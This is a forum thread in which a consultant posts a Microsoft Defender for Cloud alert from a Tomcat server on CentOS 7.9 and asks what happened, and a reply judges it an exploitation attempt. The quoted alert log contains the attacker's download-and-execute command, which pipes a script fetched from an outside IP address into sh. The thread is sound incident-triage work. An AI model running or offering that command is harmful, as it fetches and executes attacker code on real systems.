Suspicious process executed by a network service on CentOS 7.9

Toran Vaishnav · 01-17-2024, 01:28 AM

Hello community members,

I am an Azure consultant and I have a customer who is getting "Suspicious process executed by a network service on CentOS 7.9" Microsoft defender for cloud high severity alert.

Environment: Apache tomcat webserver running on CentOS 7.9

We have downloaded the defender report as follows:

[7402] java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Command line /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre//bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Process id 7402
Image file path /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java
Image file SHA1 2bffb1d3d46365ca0e78f96577123814b54dbe88
Image file last modification time May 15, 2023 8:25:05 PM
Image file java
Effective user tomcat
1/6/2024 9:11:14 PM
[7402] bash /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Command line /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Process id 7402
Image file path /usr/bin/bash
Image file SHA1 9ad737cbd8bbdddc96726156dbd3bc03936bf02f
Image file last modification time Nov 24, 2021 10:03:27 PM
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Image file bash
Effective user tomcat
Referenced in commandline http://222.108.161.27:7070/docs/da.txt
Referenced in commandline 222.108.161.27

I need help to identify what is happening here? Is the process happening within the tomcat or outside tomcat (over public ip)?

Ser Olmy · 01-18-2024, 12:00 PM

Have you looked at the file being curled, and the pastebin data it references? Yes, I'd say something nefarious is going on here.

Someone is at least attempting to start a shell process, and it looks like they're exploiting a vulnerability in tomcat (edit: or the Java application it's running) in order to do so.